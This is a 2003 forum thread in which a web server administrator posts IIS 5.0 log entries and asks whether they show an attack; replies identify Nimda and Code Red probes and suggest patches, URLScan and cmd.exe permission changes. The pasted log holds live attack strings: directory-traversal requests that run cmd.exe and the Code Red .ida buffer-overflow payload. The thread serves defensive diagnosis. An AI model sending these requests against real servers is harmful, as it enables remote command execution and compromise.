?
Solved

IIS 5.0 log files produce odd url requests

Posted on 2003-03-16
4
Medium Priority
?
333 Views
Last Modified: 2010-04-11
i'm almost sure this is either a virus like Code Red or Nimda, but i also think it's intentionally done. i believe someone is trying to find an expoit for my web server which is Windows 2000 Advanced Server with Service Pack 3 and IIS 5.0
below is a brief look at the log file that the connection scanning me has made. i'm just interested if someone can tell me if i'm right, and also how to prevent against future attacks, etc.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-16 00:27:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:42 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:42:16 202.100.108.18 - 22.22.22.22 80 GET / - 400 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.224 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:42:59 24.198.93.214 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.224 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:05 24.198.93.214 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 01:07:00 24.42.100.192 - 22.22.22.22 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

for security reasons i changed my ip to 22.22.22.22
ok well, of anyone can give me some more insight into this, a link to a web site, a tutorial on iis logging and how to determine hacker attacks would be great too. thanks
0
Comment
Question by:nonsence
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
4 Comments
 
LVL 1

Accepted Solution

by:
PaulBobby earned 150 total points
ID: 8146483
Yes that's Nimda and the new Code Red.

It's what I call the 'background radiation' of the Internet.

If you're running the latest patches, you'll be fine with respect to these attacks that is :)

There are many different variants of Nimda, and Code Red.

Read about the first incarnation of Nimda at http://vil.mcafee.com/dispVirus.asp?virus_k=99209

0
 
LVL 9

Expert Comment

by:blakogre
ID: 8146710
Here's a tip:  many of these attacks, and future attacks, revolve around privilege escalation: the attacker's code runs under the powerful SYSTEM account.  Notice how the code is going after cmd.exe?

Apply NTFS permissions to CMD.exe denying the SYSTEM account access to that file.  They'll be prevented from executing the code, and any future code will be stymied as well, assuming it uses privilege escalation.

Keep in mind: this will not cause issues with scripts.  It WILL prevent win2k "File System Protection" from being able to update the file.  To me, a minor tradeoff.  
0
 
LVL 1

Expert Comment

by:sKuLLsHoT
ID: 8149098
i would install URLscan filter from microsoft onto your server, it will catch malicious requests such as this and log them separately, also look at microsofts IISLockD tool, although its microsoft, these 2 utilities can go a long way to makin the IIS very secure

one final thing to look at is Microsoft Baseline Security advisor - it gets all the hotfix's and security patches you need for the system.

all these can be found on microsofts IIS website but using google to find the tools is probably much easier.
0
 
LVL 3

Author Comment

by:nonsence
ID: 8149173
i know about urlscan and iislockd. i also use secureiis and severmask as two 3rd party tools. anyone know any others?

this isn't by chance something smart enough that can log such activity and then block incoming access from the attacking ip address for lets say a few hours do a day is there?
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Getting to know the threat landscape in which DDoS has evolved, and making the right choice to get ourselves geared up to defend against  DDoS attacks effectively. Get the necessary preparation works done and focus on Doing the First Things Right.
A look at what happened in the Verizon cloud breach.
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…
The Email Laundry PDF encryption service allows companies to send confidential encrypted  emails to anybody. The PDF document can also contain attachments that are embedded in the encrypted PDF. The password is randomly generated by The Email Laundr…
Suggested Courses

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question